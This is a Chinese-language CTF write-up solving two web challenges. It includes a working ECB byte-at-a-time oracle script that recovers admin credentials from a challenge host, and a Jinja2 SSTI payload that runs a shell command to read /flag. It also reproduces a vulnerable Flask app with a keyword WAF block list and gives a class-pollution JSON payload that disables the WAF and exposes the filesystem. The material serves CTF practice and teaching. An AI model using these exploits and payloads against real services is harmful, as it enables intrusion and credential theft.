DIDCTF web方向wp

SecureDoc

登陆后有个ecb_oracle的漏洞可以获得密钥信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
ECB byte-at-a-time oracle solver for SecureDoc CTF
"""

import requests

BASE = "http://web-8b78ba939a.adworld.xctf.org.cn"
USERNAME = "admin"
PASSWORD = "123456"

# 这题隐藏内容是可打印字符,先用这个字符集提高速度和稳定性
CHARSET = [chr(i) for i in range(32, 127)] + ["\n", "\r", "\t"]


def login_get_session() -> requests.Session:
s = requests.Session()
r = s.post(
f"{BASE}/login",
json={"username": USERNAME, "password": PASSWORD},
timeout=10,
)
r.raise_for_status()
data = r.json()
if not data.get("message"):
raise RuntimeError(f"login failed: {data}")
return s


def oracle(sess: requests.Session, content: str) -> bytes:
r = sess.post(
f"{BASE}/documents/apply-template",
json={"content": content},
timeout=10,
)
r.raise_for_status()
data = r.json()
return bytes.fromhex(data["preview"]["encrypted_content"])


def detect_block_size(sess: requests.Session) -> int:
base_len = len(oracle(sess, ""))
for i in range(1, 65):
l = len(oracle(sess, "A" * i))
if l > base_len:
return l - base_len
raise RuntimeError("block size not found")


def detect_secret_len(sess: requests.Session, bs: int) -> int:
base_len = len(oracle(sess, ""))
for i in range(1, bs * 3):
l = len(oracle(sess, "A" * i))
if l > base_len:
return base_len - (i - 1)
raise RuntimeError("secret length not found")


def is_ecb(sess: requests.Session, bs: int) -> bool:
ct = oracle(sess, "A" * (bs * 4))
blocks = [ct[i:i + bs] for i in range(0, len(ct), bs)]
return len(blocks) != len(set(blocks))


def recover_secret(sess: requests.Session, bs: int, secret_len: int) -> str:
known = ""
for i in range(secret_len):
pad_len = bs - 1 - (i % bs)
prefix = "A" * pad_len
block_idx = i // bs

target = oracle(sess, prefix)[block_idx * bs:(block_idx + 1) * bs]

found = None
for ch in CHARSET:
probe = prefix + known + ch
blk = oracle(sess, probe)[block_idx * bs:(block_idx + 1) * bs]
if blk == target:
found = ch
break

if found is None:
print(f"[!] stop at byte {i} (char not in current CHARSET)")
break

known += found
if (i + 1) % 8 == 0 or i < 8:
print(f"[{i + 1}/{secret_len}] {known!r}")

return known


def main():
sess = login_get_session()
print("[+] login ok")

bs = detect_block_size(sess)
print(f"[+] block size: {bs}")

print(f"[+] is ECB: {is_ecb(sess, bs)}")

secret_len = detect_secret_len(sess, bs)
print(f"[+] secret length: {secret_len}")

recovered = recover_secret(sess, bs, secret_len)
print("\n=== recovered ===")
print(recovered)


if __name__ == "__main__":
main()

获得

  • 用户名:suP3r@dm!n

  • 密码:S3cur3P@ssMzk0MGFj!

登陆后打ssti

1
{{(cycler.next|attr('\137\137globals\137\137')).get('os').popen('cat /flag').read()}}

alt text

asystem

题目源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
import os
from flask import Flask, request, jsonify, render_template, send_file, render_template_string
import requests
import json

app = Flask(__name__, static_folder='static', template_folder='templates')

NODE_BACKEND_URL = os.environ.get('NODE_BACKEND_URL', 'http://127.0.0.1:3000/')
NODE_BACKEND_UPLOAD_URL = os.environ.get('NODE_BACKEND_UPLOAD_URL', 'http://127.0.0.1:3000/upload')
REQUEST_TIMEOUT = float(os.environ.get('NODE_BACKEND_TIMEOUT', '30'))


class User:
def __init__(self, role='user'):
self.role = role


def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)


WAF = ['app', '_', 'string', "'", "\"", "_", "{{", "}}", "[", "]", "/", "+",
"url", "args", "data", "form", "json", "files", "headers", "cookie", "data", "content", "date",
"method", "addr", "user", "environ", "view_args", "file", "mime", "referer",
"endpoint", "accept", "path", "host", "scheme", "origin", "host", "charset", "md5", "auth", "route",
"pragma", "range", "referrer", "script_root", "stream", "user_agent", "value", "server", "query", "access"
"self",
"config", "get", "lipsum", "cycler", "joiner", "namespace", "join", "decode", "first", "last",
"print", "exec", "eval", "compile", "globals", "locals", "setattr", "delattr", "dict", "list", "tuple",
"set", "frozenset", "map", "filter", "zip", "enumerate", "reversed", "pop", "upper", "lower", "global",
"os", "sys", "path", "env", "exit", "quit", "importlib", "subprocess", "threading", "multiprocessing",
"builtins", "translate", "sort", "base64", "encode", "pop", "base", "mro", "sub", "init"]


@app.route('/register', methods=['POST'])
def register():
raw_str = request.get_data(as_text=True)
test_waf = raw_str.lower().replace('"', '')
# check WAF
for word in WAF:
if word in test_waf:
return jsonify({'message': 'Invalid input detected', 'word': word}), 400
data = json.loads(raw_str)
user = User()
print(str(user.__init__.__globals__))
print(WAF)
merge(data, user)
print(WAF)

return jsonify({'message': 'User registered successfully, just test'}), 201


@app.route('/login', methods=['POST'])
def login():
#Not open yet.
pass


@app.route('/')
def index():
user = User()
print(user.__dict__)
return render_template('upload.html', backend_url=NODE_BACKEND_UPLOAD_URL)


@app.route('/upload', methods=['GET'])
def upload_page():
return render_template('upload.html', backend_url=NODE_BACKEND_UPLOAD_URL)


@app.route('/api/upload', methods=['POST'])
def api_upload():
if 'file' not in request.files:
return jsonify({'code': 4001, 'message': 'no file uploaded'}), 400

uploaded = request.files['file']
if not uploaded or not uploaded.filename:
return jsonify({'code': 4002, 'message': 'empty filename'}), 400

files = {
'file': (
uploaded.filename,
uploaded.stream,
uploaded.mimetype or 'application/octet-stream'
)
}

try:
resp = requests.post(
NODE_BACKEND_UPLOAD_URL,
files=files,
timeout=REQUEST_TIMEOUT,
)
except requests.RequestException as e:
return jsonify({
'code': 5020,
'message': 'backend upload request failed',
'backend': NODE_BACKEND_UPLOAD_URL,
'error': str(e)
}), 502

content_type = resp.headers.get('Content-Type', '')
if 'application/json' in content_type:
try:
payload = resp.json()
except ValueError:
payload = {
'code': resp.status_code,
'message': 'backend returned invalid json',
'raw': resp.text,
}
return jsonify(payload), resp.status_code

return jsonify({
'code': resp.status_code,
'message': 'backend returned non-json response',
'raw': resp.text,
}), resp.status_code


@app.route('/download', methods=['GET'])
def download_file():
filename = request.args.get("filename")
if not filename:
return {"error": "缺少 filename 参数"}, 400

if "flag" in filename.lower() or "config" in filename.lower():
return "you cant"

if filename.startswith("/"):
file_path = "/datas/upload_files" + filename
else:
file_path = "/datas/upload_files/" + filename

return send_file(file_path, as_attachment=True)


@app.route('/api/fix-secret')
def api_fix_secret():
try:
response = requests.get(f'{NODE_BACKEND_URL}/admin?fix=true', timeout=5)
return jsonify(response.json()) if response.status_code == 200 else (response.text, response.status_code)
except Exception as e:
return jsonify({'error': str(e)}), 500


@app.route('/protected', methods=['GET'])
def protected():
current_user = request.args.get('user', 'guest')
password = request.args.get('password', 'user')
response = requests.get(f'{NODE_BACKEND_URL}/admin', timeout=5)
data = response.json()
admin_secret_value = data['data'].get('admin_secret')

if password != admin_secret_value:
return "not allowed"

if '{{' in current_user or '}}' in current_user:
return jsonify({'message': 'Invalid input detected', 'word': '{ or }'}), 400
print(current_user)
for word in WAF:
if word in current_user:
return jsonify({'message': 'Invalid input detected', 'word': word}), 400
resp = render_template_string(f"Hello, {current_user}! You have access to this protected route.")
return jsonify({'message': f'Hello, {current_user}! You have access to this protected route.'[-40:]})


if __name__ == '__main__':
import os

try:
import _posixsubprocess

del _posixsubprocess.fork_exec
except:
pass
import subprocess

del os.popen
del os.system
del subprocess.Popen
del subprocess.call
del subprocess.run
del subprocess.check_output
del subprocess.getoutput
del subprocess.check_call
del subprocess.getstatusoutput
del subprocess.PIPE
del subprocess.STDOUT
del subprocess.CalledProcessError
del subprocess.TimeoutExpired
del subprocess.SubprocessError
app.run(debug=False, host='0.0.0.0', port=5000)

打过flask原型链污染的都很熟悉 不过这里有waf我们先利用user对象
用__init__.__globals__获取全局属性再把WAF置空

接着就可以打

1
2
3
4
5
6
7
8
9
{
"__init__":{
"__globals__":{
"app":{
"_static_folder":"/"
}
}
}
}

访问staic/flag获得flag